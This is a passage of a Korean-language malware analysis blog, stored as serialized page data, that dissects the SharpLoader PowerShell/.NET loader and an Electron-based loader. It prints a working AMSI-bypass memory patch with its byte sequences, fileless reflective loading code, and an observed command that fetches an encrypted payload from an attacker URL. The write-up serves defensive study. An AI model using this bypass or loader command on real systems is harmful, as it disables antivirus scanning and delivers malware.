바이트)",[1397,1942,1943,1947],{},[1412,1944,1945],{},[539,1946,1446],{},[1412,1948,1949],{},"정상(순수 ASCII 텍스트)",[1397,1951,1952,1957],{},[1412,1953,1954],{},[539,1955,1956],{},"매직:",[1412,1958,1959],{},"DOS batch file, ASCII text",[1397,1961,1962,1967],{},[1412,1963,1964],{},[539,1965,1966],{},"디지털 서명:",[1412,1968,1969],{},"탐지되지 않음",[1397,1971,1972,1976],{},[1412,1973,1974],{},[539,1975,1466],{},[1412,1977,1978],{},"26 / 61(분석 시점 기준)",[1397,1980,1981,1986],{},[1412,1982,1983],{},[539,1984,1985],{},"위협 레이블:",[1412,1987,1988,619,1991,619,1994,619,1996],{},[550,1989,1990],{},"trojan",[550,1992,1993],{},"downloader",[550,1995,1675],{},[550,1997,1998],{},"agentb",[532,2000,2001,2002,2005],{},"단순한 ",[550,2003,2004],{},".bat"," 파일임에도, 이 스크립트는 많은 정적 탐지를 회피하며, 난독화되고 암호화된 페이로드를 다운로드하고 실행하기 위해 PowerShell 같은 LotL(living-off-the-land) 기법에 크게 의존합니다.",[713,2007,2009,2010,2013],{"id":2008},"_42-amsi-우회-기법클래스-gofor4msi","4.2 AMSI 우회 기법(클래스: ",[550,2011,2012],{},"gofor4msi",")",[532,2015,719],{},[532,2017,2018],{},"SharpLoader가 우회하는 첫 번째 방어 메커니즘 중 하나는 AMSI(Anti-Malware Scan Interface)입니다. PowerShell과 Windows Script Host 같은 스크립팅 엔진에 통합되어 의심스러운 동작에 대한 실시간 콘텐츠 스캔을 제공하는 Microsoft 기능입니다. 멀웨어 제작자들은 엔드포인트 보호 시스템의 탐지를 피하기 위해 종종 AMSI 우회를 시도합니다.",[532,2020,2021,2022,2025,2026,2029,2030,2033,2034,2037,2038,2041],{},"SharpLoader에서 AMSI 우회는 ",[550,2023,2024],{},"amsi.dll"," 내 ",[550,2027,2028],{},"AmsiScanBuffer"," 함수에 대한 ",[539,2031,2032],{},"직접적인 메모리 내 패칭","을 통해 구현됩니다. 이 함수는 일반적으로 스크립트 콘텐츠를 분석하고 해당 콘텐츠가 의심스러운지(",[550,2035,2036],{},"AMSI_RESULT_DETECTED",") 안전한지(",[550,2039,2040],{},"AMSI_RESULT_CLEAN",")를 나타내는 결과 코드를 반환하는 역할을 합니다.",[532,2043,2044],{},"관련 메모리 내 패칭 코드는 다음과 같습니다:",[587,2046,2050],{"className":2047,"code":2048,"language":2049,"meta":593,"style":593},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[550,2051,2052,2057,2063,2069],{"__ignoreMap":593},[1679,2053,2054],{"class":1681,"line":1682},[1679,2055,2056],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[1679,2058,2060],{"class":1681,"line":2059},2,[1679,2061,2062],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[1679,2064,2066],{"class":1681,"line":2065},3,[1679,2067,2068],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[1679,2070,2072],{"class":1681,"line":2071},4,[1679,2073,2074],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[532,2076,2077],{},"이 시퀀스는 다음 단계를 수행합니다:",[2079,2080,2081,2091,2102,2112],"ol",{},[606,2082,2083,2086,2087,2090],{},[550,2084,2085],{},"LoadLibrary(\"amsi.dll\")","를 사용해 ",[539,2088,2089],{},"AMSI DLL을 프로세스에 로드","합니다.",[606,2092,2093,581,2096,2098,2099,2090],{},[550,2094,2095],{},"GetProcAddress()",[550,2097,2028],{}," 함수의 ",[539,2100,2101],{},"메모리 주소를 해석",[606,2103,2104,2107,2108,2111],{},[550,2105,2106],{},"VirtualProtect()","를 사용해 해당 주소의 ",[539,2109,2110],{},"메모리 보호를 변경","하여 쓰기 가능하게 만듭니다.",[606,2113,2114,2117,2118,2121],{},[550,2115,2116],{},"Marshal.Copy()","를 사용해 작은 셸코드 패치로 ",[539,2119,2120],{},"함수의 시작 부분을 덮어씁니다",".",[532,2123,2124],{},"64비트 시스템에 적용되는 패치는 다음과 같습니다:",[587,2126,2128],{"className":2047,"code":2127,"language":2049,"meta":593,"style":593},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[550,2129,2130],{"__ignoreMap":593},[1679,2131,2132],{"class":1681,"line":1682},[1679,2133,2127],{},[532,2135,2136],{},"이는 다음 명령어에 해당합니다:",[603,2138,2139,2149],{},[606,2140,2141,2144,2145,2148],{},[550,2142,2143],{},"mov eax, 0x80070057"," → 반환 코드를 Windows 오류 코드 ",[550,2146,2147],{},"E_INVALIDARG","로 설정",[606,2150,2151,2154],{},[550,2152,2153],{},"ret"," → 함수에서 즉시 반환",[532,2156,2157,2158,2160],{},"이는 사실상 ",[550,2159,2028],{},"가 조용히 실패하고 미탐지 결과를 반환하도록 만들어, AMSI 검사를 무력화합니다. 이제 멀웨어는 그렇지 않았다면 안티바이러스 경고를 트리거했을 스크립트나 .NET 코드를 실행할 수 있습니다.",[532,2162,2163],{},"32비트 시스템에서 실행되는 경우 다른 패치가 적용됩니다:",[587,2165,2167],{"className":2047,"code":2166,"language":2049,"meta":593,"style":593},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[550,2168,2169],{"__ignoreMap":593},[1679,2170,2171],{"class":1681,"line":1682},[1679,2172,2166],{},[532,2174,2175],{},"이는 동일한 목표(\"clean\" 결과를 강제하는 것)를 반영하지만, x86 호출 규약에 맞게 조정된 것입니다.",[532,2177,2178,619,2181,619,2184,2187],{},[550,2179,2180],{},"LoadLibrary",[550,2182,2183],{},"GetProcAddress",[550,2185,2186],{},"VirtualProtect"," 같은 원시 P/Invoke 호출을 사용하면 EDR 도구가 모니터링할 수 있는 고수준 API를 호출하지 않고도 이 패칭을 동적으로 수행할 수 있습니다. 이 방법은 간결하고 효과적이며 최소한의 포렌식 아티팩트만 남깁니다.",[532,2189,2190,2191,2194],{},"요약하면, 이 AMSI 우회 기법은 ",[539,2192,2193],{},"안티바이러스 인터페이스에 대한 저수준의 직접적인 메모리 공격","이며, 런타임 중 수 밀리초 내에 수행됩니다. 현대 엔드포인트 방어 시스템에서 행위 모니터링과 메모리 검사가 왜 필수적인지를 보여 주는 강력한 사례입니다.",[713,2196,2198],{"id":2197},"_43-2단계-페이로드-처리","4.3 2단계 페이로드 처리",[532,2200,719],{},[532,2202,2203,2204,2207],{},"AMSI 우회가 완료되면, 로더는 2단계 페이로드를 회수하고 준비하는 작업으로 진행합니다. 이 페이로드는 로더 자체에 삽입되어 있지 않고, ",[550,2205,2206],{},"$location"," 매개변수를 통해 로더가 어떻게 호출되는지에 따라 원격 서버에서 가져오거나 디스크에서 읽습니다.",[532,2209,2210,2211,2214,2215,2086,2218,2221,2222,2225,2226,2229],{},"위치가 ",[550,2212,2213],{},"http","로 시작하면 URL로 해석되고, 로더는 ",[550,2216,2217],{},"Get_Stage2()",[550,2219,2220],{},"HttpWebRequest","를 통해 페이로드를 다운로드합니다. 로컬 경로라면 ",[550,2223,2224],{},"Get_Stage2disk()","가 파일 시스템에서 직접 내용을 읽습니다. 두 경우 모두 예상되는 파일 내용은 ",[539,2227,2228],{},"Base64 인코딩되고, GZip 압축되며, AES 암호화된"," 블롭입니다.",[532,2231,2232,2233,2236],{},"그다음 로더는 전적으로 메모리에서 ",[539,2234,2235],{},"4단계 디코딩 및 복호화 파이프라인","을 수행합니다:",[2079,2238,2239,2245,2255,2265],{},[606,2240,2241,2244],{},[539,2242,2243],{},"Base64 디코딩",": 인코딩된 문자열을 원시 바이트로 변환합니다. 이 단계는 정적 검사 도구로부터 실제 바이너리 콘텐츠를 가리고 단순한 패턴 매칭을 방지하도록 설계되었습니다.",[606,2246,2247,2250,2251,2254],{},[539,2248,2249],{},"GZip 압축 해제",": 디코딩된 바이트는 ",[550,2252,2253],{},"GZipStream","으로 전달되어 페이로드를 압축 해제합니다. 압축은 파일 크기를 줄이고 또 다른 난독화 계층을 추가합니다.",[606,2256,2257,2260,2261,2264],{},[539,2258,2259],{},"AES 복호화",": 압축된 바이트는 CBC 모드에서 AES(Rijndael)를 사용해 복호화됩니다. 키는 사용자가 제공한 암호에서 SHA-256 해싱과 PBKDF2(",[550,2262,2263],{},"Rfc2898DeriveBytes","), 정적 솔트를 결합해 런타임에 파생됩니다.",[606,2266,2267,2270],{},[539,2268,2269],{},"솔트 제거",": 복호화 결과에는 여전히 고정 길이 솔트 접두사(4바이트)가 포함되어 있습니다. 이 바이트들은 수동으로 제거되어 유효한 .NET 어셈블리를 나타내는 깨끗한 바이너리 블롭을 얻습니다.",[532,2272,2273],{},"복호화 파이프라인은 다음과 같이 실행됩니다:",[587,2275,2277],{"className":2047,"code":2276,"language":2049,"meta":593,"style":593},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[550,2278,2279,2284],{"__ignoreMap":593},[1679,2280,2281],{"class":1681,"line":1682},[1679,2282,2283],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[1679,2285,2286],{"class":1681,"line":2059},[1679,2287,2288],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[532,2290,2291,2292,2295],{},"여기서 ",[550,2293,2294],{},"AES_Decrypt()","는 Rijndael 알고리즘을 감싸는 맞춤 함수이며, 256비트 키와 128비트 IV(초기화 벡터)로 구성되고, 둘 다 암호에서 파생됩니다.",[532,2297,2298],{},[539,2299,2300],{},"핵심 설계 관찰:",[603,2302,2303,2306,2309],{},[606,2304,2305],{},"PBKDF2와 함께 AES-CBC를 사용하면 암호의 무차별 대입이 사소하지 않게 됩니다.",[606,2307,2308],{},"복호화가 메모리에서 일어나므로, 중간 결과가 디스크에 기록되지 않아 포렌식 아티팩트가 줄어듭니다.",[606,2310,2311],{},"잘못된 암호가 제공되면 복호화가 조용히 실패하거나 유효하지 않은 데이터를 생성하며, 이는 실행 실패나 추적하기 어려운 예외로 이어질 수 있습니다.",[532,2313,2314],{},"요약하면, 이 다단계 페이로드 처리 방식은 시그니처 기반과 휴리스틱 기반 정적 탐지 모두의 문턱을 크게 높입니다. 라이브 실행이나 로더 동작에 대한 심층 검사 없이는, 방어자가 암호와 정확한 디코딩 로직을 함께 알지 못하는 한 삽입된 페이로드를 밝혀내기 어렵습니다.",[713,2316,2318],{"id":2317},"_44-동적-어셈블리-로딩","4.4 동적 어셈블리 로딩",[532,2320,719],{},[532,2322,2323],{},"2단계 페이로드가 성공적으로 복호화되면, 결과 바이트 배열은 유효한 .NET 어셈블리를 나타냅니다. SharpLoader는 이 어셈블리를 디스크에 쓰는 대신(안티바이러스나 EDR 시스템의 흔한 지표), 리플렉션을 사용해 메모리에서 직접 실행합니다:",[587,2325,2327],{"className":2047,"code":2326,"language":2049,"meta":593,"style":593},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[550,2328,2329,2334],{"__ignoreMap":593},[1679,2330,2331],{"class":1681,"line":1682},[1679,2332,2333],{},"Assembly a = Assembly.Load(bin);\n",[1679,2335,2336],{"class":1681,"line":2059},[1679,2337,2338],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[532,2340,2341,2342,2345],{},"이 기법은 ",[539,2343,2344],{},"파일리스 실행(fileless execution)"," 이라고 불립니다. 다음과 같은 이유로 매우 회피적입니다:",[603,2347,2348,2351,2354],{},[606,2349,2350],{},"디스크를 건드리지 않아 파일 기반 IOC(침해 지표)를 남기지 않습니다",[606,2352,2353],{},"디스크에 바이너리가 저장되지 않으므로 전통적인 포렌식 수집이 더 어려워집니다",[606,2355,2356],{},"AV 엔진은 종종 파일 스캔에 의존하므로 정적 시그니처 기반 탐지를 회피합니다",[532,2358,2359,1265,2362,2365],{},[550,2360,2361],{},"EntryPoint",[550,2363,2364],{},"static","이 아니면, 로더는 대체 로직을 포함합니다:",[587,2367,2369],{"className":2047,"code":2368,"language":2049,"meta":593,"style":593},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[550,2370,2371,2376,2381,2386,2391,2397],{"__ignoreMap":593},[1679,2372,2373],{"class":1681,"line":1682},[1679,2374,2375],{},"MethodInfo method = a.EntryPoint;\n",[1679,2377,2378],{"class":1681,"line":2059},[1679,2379,2380],{},"if (method != null)\n",[1679,2382,2383],{"class":1681,"line":2065},[1679,2384,2385],{},"{\n",[1679,2387,2388],{"class":1681,"line":2071},[1679,2389,2390],{},"    object o = a.CreateInstance(method.Name);\n",[1679,2392,2394],{"class":1681,"line":2393},5,[1679,2395,2396],{},"    method.Invoke(o, null);\n",[1679,2398,2400],{"class":1681,"line":2399},6,[1679,2401,2402],{},"}\n",[532,2404,2405,2406,2409],{},"이는 실행을 위해 인스턴스화된 객체가 필요한 어셈블리(예: 클래스 인스턴스 내부의 ",[550,2407,2408],{},"public int Main()",")와의 호환성을 보장합니다. 이 코드는 클래스의 인스턴스를 동적으로 생성한 다음 진입점 메서드를 호출합니다.",[532,2411,2412],{},"AMSI 우회 및 메모리 내 복호화와 결합되어, 이 메커니즘은 최종 페이로드를 은밀하고 완전히 파일리스한 방식으로 실행에 전달합니다. 현대의 회피적 멀웨어의 특징입니다.",[713,2414,2416],{"id":2415},"_45-명령줄-매개변수-및-유연성","4.5 명령줄 매개변수 및 유연성",[532,2418,719],{},[532,2420,2421,2422,2424],{},"PowerShell 함수 ",[550,2423,1887],{},"는 임의의 .NET 페이로드를 위한 유연한 래퍼로 작동하도록 설계되었습니다. 페이로드 위치와 인수를 모두 동적으로 입력할 수 있게 지원하여, 하나의 로더 인스턴스를 여러 작전이나 캠페인에서 재사용할 수 있습니다.",[532,2426,2427],{},[539,2428,2429],{},"지원되는 매개변수:",[603,2431,2432,2438,2444,2464],{},[606,2433,2434,2437],{},[550,2435,2436],{},"-location","(필수): 2단계 암호화 페이로드에 대한 URL 또는 로컬 파일 경로를 지정합니다.",[606,2439,2440,2443],{},[550,2441,2442],{},"-password","(필수): AES 복호화 키를 파생하는 데 사용됩니다.",[606,2445,2446,619,2449,619,2452,2455,2456,2459,2460,2463],{},[550,2447,2448],{},"-argument",[550,2450,2451],{},"-argument2",[550,2453,2454],{},"-argument3","(선택): 리플렉션을 통해 ",[550,2457,2458],{},".NET"," 어셈블리의 ",[550,2461,2462],{},"Main()"," 메서드로 직접 전달됩니다.",[606,2465,2466,2469],{},[550,2467,2468],{},"-noArgs",": 2단계 페이로드에 어떤 매개변수도 전달하지 않고 실행을 트리거합니다.",[532,2471,2472],{},"내부적으로 인수는 다음과 같이 수집되고 전달됩니다:",[587,2474,2476],{"className":1673,"code":2475,"language":1675,"meta":593,"style":593},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[550,2477,2478,2483],{"__ignoreMap":593},[1679,2479,2480],{"class":1681,"line":1682},[1679,2481,2482],{},"object[] cmd = args.Skip(2).ToArray();\n",[1679,2484,2485],{"class":1681,"line":2059},[1679,2486,2487],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[532,2489,2490],{},"이는 .NET 페이로드가 다음과 같은 시그니처를 가질 것으로 예상됨을 의미합니다:",[587,2492,2494],{"className":2047,"code":2493,"language":2049,"meta":593,"style":593},"static void Main(string[] args)\n",[550,2495,2496],{"__ignoreMap":593},[1679,2497,2498],{"class":1681,"line":1682},[1679,2499,2493],{},[532,2501,2502,2503,2505],{},"또는 대체 로직을 통해 매개변수가 없는 ",[550,2504,2462],{}," 변형으로 우아하게 되돌아갑니다. 이 동작은 레드팀이나 멀웨어 제작자가 입력에 따라 다른 작업을 수행할 수 있는 다목적 2단계를 만들 수 있게 합니다. 예를 들어 임플란트 실행, 시스템 정보 수집, C2 통신 개시 등입니다.",[532,2507,2508],{},"이러한 모듈성과 구성 가능성은 고급 멀웨어 프레임워크의 핵심 특징이며, 스크립트 기반 로더가 다운스트림 페이로드를 위한 고도로 적응적인 실행 환경으로 어떻게 작동할 수 있는지를 잘 보여 줍니다.",[713,2510,2512],{"id":2511},"_46-실제-사용-예시","4.6 실제 사용 예시",[532,2514,719],{},[532,2516,2517],{},"실제 캠페인에서 SharpLoader가 어떻게 실행되는지를 보여 주기 위해, 실제로 관찰된 다음 호출을 살펴봅시다:",[587,2519,2521],{"className":1673,"code":2520,"language":1675,"meta":593,"style":593},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[550,2522,2523],{"__ignoreMap":593},[1679,2524,2525],{"class":1681,"line":1682},[1679,2526,2520],{},[532,2528,2529],{},"이 예시는 SharpLoader의 전형적인 사용 사례를 강조합니다:",[603,2531,2532,2546,2558,2568],{},[606,2533,2534,2537,2538,2541,2542,2545],{},[539,2535,2536],{},"Location 인수",": URL은 은폐된 2단계 페이로드 ",[550,2539,2540],{},"calc.enc","를 호스팅하는 원격 서버를 가리킵니다. 이 엔드포인트는 HTTPS 인증서 검증에 흔히 사용되는 정상적으로 보이는 ",[550,2543,2544],{},".well-known"," 디렉터리 아래에 위치하여, URL을 정상 웹 트래픽에 섞이도록 돕습니다.",[606,2547,2548,974,2551,2553,2554,2557],{},[539,2549,2550],{},"페이로드 특성",[550,2552,2540],{},"는 Base64 인코딩되고, GZip 압축되며, AES 암호화된 ",[539,2555,2556],{},"삼중 난독화 파일","입니다. 이 난독화 파이프라인은 페이로드가 메모리에서 완전히 실행되고 복호화되지 않는 한 대부분의 탐지 메커니즘에 불투명하도록 보장합니다.",[606,2559,2560,2563,2564,2567],{},[539,2561,2562],{},"Password 인수",": 문자열 ",[550,2565,2566],{},"UwUFufu1","은 SHA-256과 PBKDF2를 통해 AES 키를 파생하기 위해 런타임에 사용됩니다. 이 암호가 없으면 페이로드를 복호화할 수 없어, 맥락 없는 오프라인 분석이 거의 불가능합니다.",[606,2569,2570,974,2573,2575],{},[539,2571,2572],{},"추가 인수 없음",[550,2574,2468],{}," 스위치는 복호화된 .NET 어셈블리에 어떤 명령줄 매개변수도 전달되지 않음을 나타내며, 기본 실행 경로를 트리거합니다.",[532,2577,2578,2579,2582],{},"이 은밀한 호출 체인은 SharpLoader의 핵심 목적을 압축적으로 보여 줍니다. 단순한 PowerShell 구문을 통해 최대한의 난독화와 회피로 ",[539,2580,2581],{},"파일리스하고, 적응적이며, 안전한 페이로드 전달","을 수행하는 것입니다.",[713,2584,2586],{"id":2585},"_47-요약","4.7 요약",[532,2588,719],{},[532,2590,2591,2593],{},[550,2592,1887],{}," 구성은 네이티브 시스템 구성 요소, 리플렉션, 암호화를 활용해 거의 전적으로 메모리에서 작동하는, 고도로 정교하고 회피적인 멀웨어 스테이징 기법을 잘 보여 줍니다.",[532,2595,2596],{},[539,2597,2598],{},"핵심 요점:",[603,2600,2601,2609,2615,2621],{},[606,2602,2603,974,2606,2608],{},[539,2604,2605],{},"AMSI 우회",[550,2607,2028],{},"의 직접적인 메모리 내 패칭이 탐지 가능한 API를 호출하지 않고 안티바이러스 검사를 비활성화합니다.",[606,2610,2611,2614],{},[539,2612,2613],{},"안전한 페이로드 처리",": 암호화되고 압축된 2단계 페이로드의 회수가 기밀성을 보장하고 여러 회피 계층을 추가합니다.",[606,2616,2617,2620],{},[539,2618,2619],{},"메모리 전용 실행",": 복호화된 페이로드는 디스크에 절대 기록되지 않아, 전통적인 파일 기반 스캐너에 의한 탐지를 거의 불가능하게 만듭니다.",[606,2622,2623,2626],{},[539,2624,2625],{},"모듈형이고 재사용 가능한 아키텍처",": PowerShell 매개변수를 통해 SharpLoader는 다양한 페이로드와 런타임 동작으로 캠페인 전반에 걸쳐 유연하게 재사용될 수 있습니다.",[528,2628,2630,2631,2633],{"id":2629},"_5-심층-분석-mainexe-electron-기반-멀웨어-로더","5. 심층 분석: ",[550,2632,577],{}," – Electron 기반 멀웨어 로더",[532,2635,534],{},[532,2637,2638,2639,2641,2642,2645,2646,2648,2649,2651],{},"리버스 엔지니어링 과정에서, Microsoft Defender for Endpoint가 플래그한 ",[550,2640,577],{},"가 일반적인 바이너리가 아니라 ",[539,2643,2644],{},"Electron 기반 멀웨어 로더","임이 분명해졌습니다. 이것은 ",[550,2647,1819],{},"라는 아카이브 안에 담겨 전달되었으며, ",[550,2650,573],{},"가 런타임에 이를 다운로드하고 추출했습니다. 압축을 풀자, 그 구조와 내용은 전형적인 Electron 애플리케이션과 매우 유사했습니다.",[713,2653,2655],{"id":2654},"_51-electron-구조-인식","5.1 Electron 구조 인식",[532,2657,719],{},[532,2659,2660],{},"추출된 폴더에는 다음과 같은 파일들이 포함되어 있었습니다:",[603,2662,2663,2674,2683,2689],{},[606,2664,2665,619,2668,619,2671],{},[550,2666,2667],{},"chrome_100_percent.pak",[550,2669,2670],{},"v8_context_snapshot.bin",[550,2672,2673],{},"d3dcompiler_47.dll",[606,2675,2676,2679,2680],{},[550,2677,2678],{},"LICENSES.chromium"," 및 ",[550,2681,2682],{},"LICENSES.electron",[606,2684,2685,2686,2688],{},"큰 ",[550,2687,577],{}," 바이너리(~150 MB)",[606,2690,2691,2693,2694,2697,2698,2700],{},[550,2692,1048],{},"와 보조 바이너리 ",[550,2695,2696],{},"elevate.exe","를 담은 ",[550,2699,1829],{}," 폴더",[532,2702,2703],{},[747,2704],{"alt":2705,"src":2706},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[532,2708,2709,2710,2712],{},"이들은 모두 Chromium과 Node.js를 사용해 JavaScript 기반 데스크톱 애플리케이션을 패키징하는 Electron 앱의 강력한 지표입니다. 권한 상승에 흔히 사용되는 서명된 Microsoft 바이너리 ",[550,2711,2696],{},"의 존재는 추가적인 의심을 불러일으켰습니다. 상승된 권한으로 자식 프로세스를 실행하는 데 악용될 수 있기 때문입니다.",[713,2714,2716],{"id":2715},"_52-압축-해제-및-정적-분석심층-분석","5.2 압축 해제 및 정적 분석(심층 분석)",[532,2718,719],{},[532,2720,2721,2723,2724,2726,2727,2729,2730,2732,2733,2736],{},[550,2722,577],{},"를 실행하는 대신, 저는 라이브 동작을 트리거하지 않기 위해 정적 분석 접근을 택했습니다. ",[550,2725,577],{},"가 Electron으로 빌드되었다는 초기 의심은 ",[550,2728,1829],{}," 디렉터리 안에서 ",[550,2731,1048],{}," 파일을 찾아냄으로써 확인되었습니다. Electron 앱에서 이 아카이브는 JavaScript 파일, 구성(",[550,2734,2735],{},"package.json","), 자산 등 모든 핵심 애플리케이션 로직을 담고 있으며, 성능과 난독화를 위해 맞춤 형식으로 패킹됩니다.",[532,2738,2739,2742,2743,2746],{},[550,2740,2741],{},".asar"," 아카이브는 본질적으로 ",[550,2744,2745],{},".zip","과 유사한 읽기 전용 고성능 컨테이너이지만, Electron의 런타임에 최적화되어 있습니다. 암호화되지는 않지만 코드 접근을 난독화하여, 압축을 풀지 않는 한 정적 분석을 더 까다롭게 만듭니다.",[532,2748,2749,2750,2753],{},"압축을 풀기 위해, 저는 npm을 통해 제공되는 공식 ",[550,2751,2752],{},"asar"," 도구를 사용했습니다. 단계는 다음과 같습니다:",[587,2755,2759],{"className":2756,"code":2757,"language":2758,"meta":593,"style":593},"language-bash shiki shiki-themes github-light github-dark","npm install -g asar\nasar extract app.asar extracted_app\n","bash",[550,2760,2761,2778],{"__ignoreMap":593},[1679,2762,2763,2767,2771,2775],{"class":1681,"line":1682},[1679,2764,2766],{"class":2765},"sScJk","npm",[1679,2768,2770],{"class":2769},"sZZnC"," install",[1679,2772,2774],{"class":2773},"sj4cs"," -g",[1679,2776,2777],{"class":2769}," asar\n",[1679,2779,2780,2782,2785,2788],{"class":1681,"line":2059},[1679,2781,2752],{"class":2765},[1679,2783,2784],{"class":2769}," extract",[1679,2786,2787],{"class":2769}," app.asar",[1679,2789,2790],{"class":2769}," extracted_app\n",[532,2792,2793,2794,2797],{},"위 명령을 실행하자 콘텐츠가 작업 폴더(",[550,2795,2796],{},"extracted_app/",")로 추출되었고, 실제 JavaScript 애플리케이션 코드가 드러났습니다. 여기에는 다음이 포함되었습니다:",[603,2799,2800,2821,2829],{},[606,2801,2802,619,2805,619,2808,2811,2812,2814,2815,2817,2818,2820],{},[550,2803,2804],{},"jscryter.js",[550,2806,2807],{},"input.js",[550,2809,2810],{},"obf.js",": 이 스크립트들이 멀웨어 로직을 형성합니다. ",[550,2813,2804],{},"는 페이로드 전달을 오케스트레이션하는 것으로 보이고, ",[550,2816,2807],{},"는 구성 상수나 명령 로직을 정의하며, ",[550,2819,2810],{},"는 핵심 페이로드 로직을 담고 있을 가능성이 높은 심하게 난독화된 스크립트입니다.",[606,2822,2823,619,2825,2828],{},[550,2824,2735],{},[550,2826,2827],{},"package-lock.json",": 런타임 환경을 정의합니다",[606,2830,2831,974,2834,619,2837,619,2840,2843],{},[550,2832,2833],{},"node_modules/",[550,2835,2836],{},"axios",[550,2838,2839],{},"adm-zip",[550,2841,2842],{},"child_process"," 같은 모든 의존성을 포함합니다",[532,2845,2846,2847,2849,2850,2852],{},"압축 해제된 콘텐츠는 실행 없이도 멀웨어 로직에 대한 완전한 가시성을 제공했으며, 이는 안전한 리버스 엔지니어링에 필수적이었습니다. 이 단계는 ",[550,2848,577],{},"가 순전히 ",[550,2851,1048],{}," 안에 숨겨진 악성 스크립트를 위한 런타임 래퍼 역할을 했음을 확인시켜 주었습니다.",[713,2854,2856],{"id":2855},"_53-정적-분석이-밝혀낸-것","5.3. 정적 분석이 밝혀낸 것",[532,2858,719],{},[532,2860,2861],{},"코드를 수동으로 검사함으로써, 저는 멀웨어 로직이 완전히 JavaScript 기반이며 Electron 런타임 내에서 실행됨을 확인했습니다. 스크립트는 다음을 수행하도록 설계되었습니다:",[603,2863,2864,2871,2876,2879],{},[606,2865,2866,2867,2870],{},"대체 URL에서 암호화된 페이로드(",[550,2868,2869],{},"pyth.zip",")를 다운로드합니다",[606,2872,2873,2875],{},[550,2874,2839],{},"을 사용해 아카이브를 추출합니다",[606,2877,2878],{},"문자열 치환을 수행하여 특정 자격 증명이나 지갑 주소를 주입합니다",[606,2880,2881,557,2884,2886,2887,2889],{},[550,2882,2883],{},"child_process.exec()",[550,2885,552],{},"를 통해 결과 Python 파일(",[550,2888,584],{},")을 실행합니다",[532,2891,2892,2893,2895,2896,2899],{},"결정적으로, 로더에는 ",[550,2894,573],{},"가 아직 존재하지 않는 경우 이를 ",[539,2897,2898],{},"사용자의 AppData 디렉터리로 복사하는"," 로직도 포함되어 있었습니다. 이는 지속성을 강화하고 감염 루프를 유지했습니다.",[528,2901,2903,2904,2906],{"id":2902},"_6-심층-분석-inputjs-암호화된-javascript-페이로드-로더","6. 심층 분석: ",[550,2905,2807],{}," – 암호화된 JavaScript 페이로드 로더",[532,2908,534],{},[532,2910,2911,2913],{},[550,2912,2807],{},"는 분석한 멀웨어 체인에서 중요한 구성 요소로, 암호화된 JavaScript 페이로드의 복호화 및 실행 허브 역할을 합니다. 이 스크립트는 자신의 핵심 기능을 강력한 암호화 계층 뒤에 숨기고 런타임에만 그 동작을 드러냅니다.",[713,2915,2917],{"id":2916},"_61-암호화-및-복호화-메커니즘","6.1 암호화 및 복호화 메커니즘",[532,2919,719],{},[532,2921,2922,2923,2925],{},"언뜻 보면 ",[550,2924,2807],{},"에는 읽을 수 있는 코드가 거의 없습니다. 그러나 그 주된 목적은 스크립트 자체에 저장된 크고 난독화된 JavaScript 블롭을 복호화하고 실행하는 것입니다.",[861,2927,2929],{"id":2928},"_611-복호화-로직","6.1.1 복호화 로직",[532,2931,867],{},[532,2933,2934,2935,2938],{},"이 스크립트는 네 개의 매개변수를 받는 ",[550,2936,2937],{},"decrypt()"," 함수를 정의합니다:",[603,2940,2941,2947,2953,2959],{},[606,2942,2943,2946],{},[550,2944,2945],{},"encdata",": 암호화된 Base64 인코딩 데이터",[606,2948,2949,2952],{},[550,2950,2951],{},"masterkey",": 평문 패스프레이즈",[606,2954,2955,2958],{},[550,2956,2957],{},"salt",": 암호화 솔트(Base64)",[606,2960,2961,2964],{},[550,2962,2963],{},"iv",": AES 복호화를 위한 초기화 벡터(Base64)",[532,2966,2967,2968,2971],{},"복호화 과정은 Node.js의 내장 ",[550,2969,2970],{},"crypto"," 모듈을 사용해 구현됩니다. 진행 순서는 다음과 같습니다:",[2079,2973,2974,3085,3198],{},[606,2975,2976,2979,2980,3059],{},[539,2977,2978],{},"키 파생:","\n스크립트는 PBKDF2(Password-Based Key Derivation Function 2)를 사용해 256비트 대칭 키를 파생합니다:",[587,2981,2985],{"className":2982,"code":2983,"language":2984,"meta":593,"style":593},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[550,2986,2987,3009,3014,3031,3039,3046,3053],{"__ignoreMap":593},[1679,2988,2989,2993,2996,2999,3003,3006],{"class":1681,"line":1682},[1679,2990,2992],{"class":2991},"szBVR","const",[1679,2994,2995],{"class":2773}," key",[1679,2997,2998],{"class":2991}," =",[1679,3000,3002],{"class":3001},"sVt8B"," 